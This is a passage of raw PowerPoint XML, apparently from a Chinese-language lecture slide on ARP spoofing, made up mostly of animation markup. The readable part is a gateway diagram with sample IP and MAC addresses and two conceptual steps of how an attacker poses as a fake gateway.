                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26632"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold" nodeType="afterGroup">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6641"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26641"/>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6642"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2664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6643"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26643"/>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6644"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2664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6645"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26645"/>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6646"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2664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6635"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="266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647"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2664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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26647"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2664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6663"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26663"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="81" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="82" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0 0 L 0.06302 -0.10486 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26663"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="84" fill="hold" nodeType="afterGroup">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6664"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="266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665"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="266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666"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26666"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="94" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="95" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="2" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.06302 -0.10486 L -0.21667 0.00509 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="96" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26663"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-1400000" y="550000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="97" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="98" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.00018 0.00023 L 0.16164 0.12107 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26666"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="810000" y="600000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="100" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="101" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.00017 0.00024 L 0.38212 0.11019 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26664"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="1910000" y="550000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="103" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="104" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.00018 0.00023 L -0.02725 -0.22546 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26665"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-140000" y="-1130000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="106" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="107" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26639"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26639"/>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p:cBhvr>
                                        <p:cTn id="111" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26664"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="112" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26664"/>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p:cBhvr>
                                        <p:cTn id="114" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26665"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="115" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26665"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="116" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="117" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26666"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26666"/>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p:cBhvr>
                                        <p:cTn id="120" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26663"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="121" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26663"/>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9" presetClass="entr" presetSubtype="0" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="125" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26649"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="126" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26649"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="127" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26649"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect prLst="gradientSize: 0.1">
                                      <p:cBhvr>
                                        <p:cTn id="128"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bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26638" grpId="0" animBg="1"/>
      <p:bldP spid="26641" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26642" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26643" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26644" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26645" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26646" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26647" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26647" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26663" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26663" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26663" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26663" grpId="3" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26664" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26664" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26664" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26665" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26665" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26665" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26666" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26666" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26666" grpId="2" bldLvl="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28625" y="0"/>
            <a:ext cx="7993063" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217096" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2088878" y="2253382"/>
            <a:ext cx="4019550" cy="704850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="422" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="422" y="440"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2130" y="444"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2130" y="24"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2532" y="30"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2532" h="444">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="422" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422" y="440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2130" y="444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2130" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2532" y="30"/>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08" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1360215" y="2478807"/>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0260.8c01.2222</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72709" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5892528" y="2478807"/>
            <a:ext cx="1198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0260.8c01.3333</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72710"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4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66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23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1963465" y="1967632"/>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Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72713" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5984603" y="1967632"/>
            <a:ext cx="293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Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72714"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203" y="3574182"/>
            <a:ext cx="12954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14" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4139928" y="2924895"/>
            <a:ext cx="0" cy="64928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16" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779565" y="4221882"/>
            <a:ext cx="1295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2100"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网关</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72717" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3274740" y="458224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0260.8c01.1111</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72718" name="Rectangle 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331640" y="270899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10.0.0.2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72719" name="Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3274740" y="4869582"/>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10.0.0.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72720" name="Rectangle 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867128" y="2782020"/>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10.0.0.3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217123" name="Line 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2482578" y="2061295"/>
            <a:ext cx="3384550" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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24" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="968722" y="944117"/>
            <a:ext cx="6912867" cy="8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rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击者在局域网段发送虚假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;IP/MAC&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信息，篡改网关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址，使自己成为假网关</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217125" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="968722" y="930275"/>
            <a:ext cx="6571529" cy="8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rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>受害者将数据包发送给假网关（攻击者）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217127" name="Line 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4859065" y="2493095"/>
            <a:ext cx="1152525" cy="1152525"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0000FF"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>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0" name="Line 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2411140" y="1916832"/>
            <a:ext cx="3455988" cy="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1" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="683569" y="4956022"/>
            <a:ext cx="8011242" cy="88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rPr>
              <a:t>3. </a:t>
